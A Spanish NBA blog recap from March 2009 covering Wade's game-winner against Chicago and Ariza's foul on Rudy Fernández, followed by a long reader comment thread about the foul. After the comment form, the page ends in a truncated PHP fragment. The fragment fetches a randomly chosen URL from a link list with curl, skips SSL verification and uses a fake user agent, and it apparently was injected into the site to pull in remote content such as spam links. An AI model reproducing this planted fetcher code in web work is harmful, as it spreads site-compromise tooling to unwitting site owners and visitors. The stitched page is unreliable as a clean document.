La Crónica (09/03/2009)

10 de March de 2009 por TheDeerHunter

Otra vez Wade. Increíble. El jugador perfecto por potencia, habilidad, conocimiento del juego, implicación, generosidad e instinto asesino. Si algo le ha podido faltar tradicionalmente este año lo ha corregido en buena medida y anoche lo demostró matando a Chicago en la segunda prórroga como sólo lo saben hacer los grandes. Con empate en el marcador logra robar el último balón y anotar un triple. ¿Os suena? Toda la belleza del baloncesto comprimida en un solo cuerpo.

Después de eso todavía tiene más pecado la falta asesina de Ariza a Rudy (ver video), que terminó con los maltrechos huesos del mallorquín en el hospital. No es la primera jugada de este tipo que hace Ariza y deberá ponerle freno a su descerebramiento. Con el susto en el cuerpo los Blazers se picaron y les dieron un baño gordo a los líderes, donde sólo Pau cumplió. Por cierto, otras veces hemos mencionado la actitud fría y distante de Roy con respecto a sus compañeros pero ayer dio gustso ver como defendió a Rudy.

Los Rockets le dieron un bocado gordo a la clasificación ganando a domicilio a los Nuggets, donde poco efecto tuvo el retorno de K. Martin a la hora resolver la situación convulsa por la que atraviesan. Dos partidos de ventaja y dos líneas de juego que apuntan en direcciones contrarias. Los Nuggets un 38% en tiros de campo… ¿Hubiera Iverson logrado empeorar tal actuación?

Desde luego Richard Hamilton no será quien le eche de menos. Anoche, actuación superlativa contra Orlando y victoria meritoria de Detroit que se rehizo de la ausencia por lesión desde el primer cuarto de Rasheed Wallace. Aunque no nos le creamos, Kwame Brown aprovechó sus minutos y se convirtió en uno de los destacados del partido con una buena defensa sobre Dwight Howard. Muy meritoria también la victoria de los Hawks contra los enrachados Hornets. Partidazo de Joe Johnson que por fin les hace levantar cabeza tras unas semanas de flojera.

Por último, en la parte baja los Wizards ganaron a los Timberwolves con gran actuación de Caron Butler. Con esta victoria salen de la última plaza en detrimento de los… Kings.

PREMIOS

MVP: Ya hemos comentado en la crónica los maravillosos partidos de Caron Butler (27-10-6), Brandon Roy (27-6-5), Rip Hamilton (29-3-14) o Joe Johnson (30-4-2) pero todos empalidecen ante una nueva exhibición del jugador más en forma del momento: Dwyane Wade. 48 puntos, 6 rebotes, 12 asistencias y autor del robo y el triple que decidió el partido en el último segundo. Los pocos no-creyentes empiezan a dudar…

Rookie: Mientras Wade realizaba su exhibición, Derrick Rose y Michael Beasley luchaban por el título de Rookie del día. Aunque los 2 acabaron el partido con unos porcentajes sonrojantes, podríamos decir que los 23 puntos y 9 rebotes del de Chicago le otorgan el galardón.

Sorpresa: No sé que nos sorprende más: los 20 rebotes de David West o el buen partido de Kwame Brown. El premio para los 2.

Decepción: Dicen que ayer Turkoglu jugó en Detroit pero nosotros no lo vimos. En su lugar, un fantasma se paseó para anotar 2 puntos en 20 minutos de juego. Mención especial para los Lakers que cuajaron un partido simplemente horrible.

El mayor esfuerzo en vano: Los Bulls forzaron 2 prórrogas a Miami y tan solo la genialidad de Dwyane Wade desequilibró finalmente la balanza. Frente a Wade, la actuación de Ben Gordon no se quedó atrás, 43 puntos nada más y nada menos.

Y para acabar el canastón de Wade que finiquitó el partido frente a los Bulls:

Comenta

26 comentarios a esta entrada

  1. Rob dice:
    #1

    Menudo salvaje este Ariza, encima se pone chulito. Un tío así no debería jugar, espero que le caiga una buena sanción

      Citar

  2. Viva_Dirk dice:
    #2

    ¿Podria haber empeorado Iverson la actuación de Detroit?

    Pues si deberia caerle una sanción a Ariza por reincidencia, ¡a ver si vuelve Bynum!.

      Citar

  3. xapa_croack dice:
    #3

    vaya par de distintos brutos anoche, wade y ariza.

      Citar

  4. Txusma dice:
    #4

    Vamos a prohibir el nombre de Iverson durante un par de semanas… 😀

    Estos Lakers muy duros ultimamente no? De momento ya tienen en su haber la costilla rota de Gerald Wallace. Espero que lo de Rudy no sea nada.

      Citar

  5. kantonyo dice:
    #5

    Yo ya me habia planteado que algún día Rudy recibiera un golpetazo de este estilo, ya que su desparpajo y valentía para entrar a canasta tiene estos inconvenientes. Parece que le han devuelto de alguna forma la colleja por el mate a Howard……

    Por cierto, creo que el articulo se equivoca, ya que la paliza de Porltand no vino a consecuencia de que los Blazers se picaran por el susto de Rudy. La paliza fue antes y luego en el último cuarto incluso hubo momentos que Lakers se acercó. En el momento del golpe iban 83-55 casi de 30. Creo que el artículo confunde.

    Es una victoria importantísima para Porltland, pq necesita partidos así para ir ganando confianza, hasta ahora tenian una gran regularidad contra rivales cómodos pero no habian conseguido ganar a ningun grande de esta manera. Además igualan en el primer puesto de la División con Utah, adelantando a Denver.

    Por último destacar la gran calidad de Wade, no vi el partido, pero solo con el resumen basta para ver que está entre los tres mejores jugadores de la liga junto con James y Bryant.

      Citar

  6. UnderlocK dice:
    #6

    Lamentable lo de Ariza, esperemos que se recupere bien Rudy. No entiendo el cabreo que tiene despues Ariza, como si le hubiesen hecho la falta a el.

    Que partidazo de Wade y ya van bastante este año, con unos porcentajes buenisimos, esta un escalon por encima de los demas.

    Wade MVP!

      Citar

  7. sabas dice:
    #7

    Kantoniyo si tratasde justificar la violencia mal vamos. Una cosa es atacar con agresividad el aro y otra lo que a hecho Ariza. No confundamos el baloncesto con el tocino

      Citar

  8. TheDeerHunter dice:
    #8

    Según tengo entendido, hablando Roy sobre el incidente dijo que había sido un momento muy duro para ellos ver como sacaban a su compañero en camilla y de ahí que cuando los Lakers se acercaron en el marcador más motivación pusieron para mantener la victoria.

    Portland no gana a los grandes porque entre otras cosas su juego es completamente plano… está muy bien para asegurar objetivos pero parece inadecuado para dar la campanada en playoffs. Pronto comprobaremos qué es eso de “balones a Roy” a 7 partidos contra el mismo rival en playoffs.

    Seamos coherentes. Lo mismo que hemos admitido que (el innombrable según el jefe) empeoraba a Denver habrá que admitir ahora que hay otros que son tanto o más culpables que él. Los flashes vuelven a iluminar a Melo y a Karl… y mi pronóstico vuelve a coger fuerza (aunque no la suficiente gracias a Billups)

      Citar

  9. david dice:
    #9

    Pues a mí no me parece una entrada asesina, no al menos con ese calificativo. Es muy dura, merecedora de la descalificante, pero tampoco me parece que vaya a hacer daño.
    Casi me pareció más bruta por la que expulsaron a Davis el viernes contra Varejao, otro buen hachazo.

    Wade, Wade… bufff!

      Citar

  10. javi dice:
    #10

    Sobre lo de Ariza, la verdad es k es una falta dura, pro tpc creo que fuese a hacer daño.Lo peor ha sido la caída, sin embargpo creo que acciones como esta debería hacerse plantear a la nba este tipos de cosas.Cuantas faltas vemos de este tipo al año y sigue igual.Esta claro que el espectaculo vende, y si hubiese echo el tapon sería el haier play off the day pro cuando pasan estas cosas….

    Esto es lo que tiene tener mal perder y tb lo que tiene vender el espectaculo x encima de todo.

    Es mi opinionn ehh que no os parezca mal, falta si pro de estas hay bastantes y xq hay veces que de milagro no lo son y ala!!, t premiamos con tus 30 segundos de gloria aunk si llegases una centesima despues estaríamos lamentadolo.

    salu2

      Citar

  11. MagicJohnson32 dice:
    #11

    El problema de la falta de Ariza es la velocidad a la que van y la caída. Sin duda, es muy imprudente y merecedora de descalificante.

    Mucho peor fue, por ejemplo, la de Shaq a Stuckey: http://www.youtube.com/watch?v=DobXKM8CfuU
    O, como dice David, la falta de Davis a Varejao del otro día: http://www.youtube.com/watch?v=zSh0wZYjbR8

    Vaya leñazos…

      Citar

  12. Txusma dice:
    #12

    Las de Shaq y Davis son para darles de comer aparte pero no por ello vamos a mitigar la dureza de la falta de Ariza. Como jugadores de basket saben que cuando contactas muy fuerte y sin ningun tipo de control a un rival en el aire, es muy posible que caiga mal pudiendose lesionarse levemente (por ejemplo un simple esguince de tobillo) o gravemente (lesion cervical). Ariza no va a hacer un tapon. Ariza va a pegar un manotazo a Rudy. Claramente, creo.

    http://www.latimes.com/media/photo/2009-03/45487553.jpg

      Citar

  13. kantonyo dice:
    #13

    Lo siento Sabas pero no se donde has visto que justifique la violencia??? me has dejado alucinado, a lo mejor es que me he explicado mal o dado a entender algo que no queria.

    Lo unico que decia es que alguna vez habia pensado que podia suceder, pq me he puesto en el pellejo de Rudy, fisicamente puedo ser parecido, y me he planteado si yo me atreveria a hacer un mate en la cara de Howard por ejemplo, y entonces me surgio la idea de que un jugador de estas caracteristicas o incluso menos fuerte como ARiza con un simple golpe me podría dejar agilipollado… Por eso decia que Rudy es bastante valiente y que no se acojona al entrar a canasta.

    Pero para nada justifico la entrada de ARiza, me parece incomprensible y más aun cuando el partido estaba totalmente decidido. Y además yo si creo que unos partidos le tenian que haber caido, su acción va totalmente en contra del espectaculo.

    Un saludo

      Citar

  14. kantonyo dice:
    #14

    Por cierto en la entrada de wikipedia en ingles : http://en.wikipedia.org/wiki/Rudy_Fern%C3%A1ndez_(basketball), ademas de ya actualizar la acción de Ariza. Creo que comentan que Rudy se vio perjudicado por la votación del jurado en el Slam Dunk y lo enlazan con este articulo: http://www.cbssports.com/mcc/blogs/entry/6264363/13585850 , donde afirman que Rudy tuvo que estar en la final del concurso como mínimo.

    Lo digo pq me parece interesante que los administradores de wikipedia dejen poner una opinión en un articulo que solo debería informar, aunque sea a favor de Rudy.

      Citar

  15. MagicJohnson32 dice:
    #15

    A mí no me lo parece. Me parece que va al tapón pero con una velocidad y una fuerza desmedidas. Como digo, es una imprudencia tremenda, pero no veo que vaya a hacer daño. Si congelas el vídeo de arriba en el 1:28, ves que la mano de Ariza está completamente en el balón. Alguien que va a hacer daño, a golpear, no busca el balón así. El problema de hecho no es el golpe que le da, sino que Ariza se lleva el brazo de Rudy y lo desequilibra, con lo que Rudy cae muy mal. Por supuesto, ya digo, es descalificante de libro y una falta muy peligrosa, pero fruto de la imprudencia y no de la mala intención. O eso creo.

    Ah, una duda ¿cuándo decís que Ariza es reincidente a qué os referís? Porque ahora no caigo…

    Por cierto, curioso que el único que va a interesarse por Rudy sea Farmar.

      Citar

  16. sabas dice:
    #16

    Ok, KANTONIO. Y para aquellos que simplemente les parece dura y que va al balon que la vuelvan a ver. Es por detras y en el aire, vamos que no va al balon seguro. A lo mejor el problema es que ya no nos acordamos de cuando jugabamos al baloncesto

      Citar

  17. TheDeerHunter dice:
    #17

    Sabas… por detrás y en el aire, pero con posibilidad de llegar al tapón.
    Para mí es una jugada tremenda, pero como muchas otras sin más. Muchos no nos acordamos de cuando jugabamos al baloncesto… pero el prisma con el que hay que valorar la jugada es el de un profesional como Ariza, cuya obligación es lanzarse a por la bola si él cree que tiene alguna posibilidad de llegar a ella.
    Otra cosa es que su cálculo haya fallado, pero la mala intención no la insinúa ni la mayoría de jugadores de Portland. Por ella merecería ser sancionado, pero para nada demonizado.

    Magic, supongo que la reincidencia se refiere al incidente con Wallace, ¿no?? Este chico está tomando un camino nada recomendable…

      Citar

  18. Txusma dice:
    #18

    Si Magic. A mi tb me parecio curioso ver a Rudy “muriendose” en el suelo y al resto de jugadores enzarzados unos metros mas alla. Al principio se interesa por el Farmar pero al rato ni eso…
    No se. Yo creo que Ariza no llegaba a taponar de ninguna manera y que va a golpear el brazo, con la mala fortuna de llevarselo con el y provocar la caida. Gesto feo.

      Citar

  19. Txusma dice:
    #19

    Kantonyo, el articulo de Rudy dice que “…fue eliminado en primera ronda, lo que para algunos parecio injusto” (mas o menos) e incluye referencias. No creo que sea una opinion, sino un hecho y si se aportan referencias perfecto.
    Aqui tb podemos ver la grandeza de la Wikipedia: 2 dias despues de un suceso el articulo ya esta editado…

      Citar

  20. MagicJohnson32 dice:
    #20

    a Deer… ¿Incidente con Wallace? ¿Qué incidente con Wallace tuvo Ariza?

    Y a Sabas… Cuando uno no va al balón, no le da al balón (ahora, por algún motivo, me acuerdo de Pablo Alfaro).

      Citar

  21. sabas dice:
    #21

    Sera que para gusto los colores pero si eso es posibilidad de jugar el balon yo ligo casi todos los dias Por lo menos quedamos en que la jugada es fea y que el unico que se preocupe algo por el estado de Fernandad sea un jugador de los Lakers habla del compañerismo que hay en la NBA.

      Citar

  22. MagicJohnson32 dice:
    #22

    Hablará del compañerismo que hay en los Blazers ¿no? :-p

    Por cierto, ni Glen Davis fue sancionado por esa falta a Varejao, ni Shaq fue sancionado por la falta a Stuckey.

    Supongo que si no hay conmoción cerebral (caso Horford-Ford) no hay sanción.

      Citar

  23. Txusma dice:
    #23

    Vaya criterio mas extraño. Lo de Shaq se merecia una sancion como un piano…

      Citar

  24. kantonyo dice:
    #24

    yo creo que una acción así si merece sanción, pq va contra el espectaculo, ahora Rudy cada vez que intente un mate, se lo pensará dos veces y eso es una pena. Por lo tanto yo estoy totalemente en contra de los “Pablo Alfaro” que dice Magic.

      Citar

  25. Viva_Dirk dice:
    #25

    Ariza no puede llegar al balón pero no veo mala intención en la acción, y es seguro que no se me ha olvidado cuando jugaba al baloncesto porque sigo jugando.

    Y lo del compañerismo me parece una tontería, hay 40 asistentes y 78 asistentes de los asistentes para estar pendientes de Rudy mientras los compañeros se van a por Ariza.

      Citar

  26. aro_pasado_no_newtoniano dice:
    #26

    Ariza, te descuidas y te atiza. Ariza dimissió¡¡¡¡¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>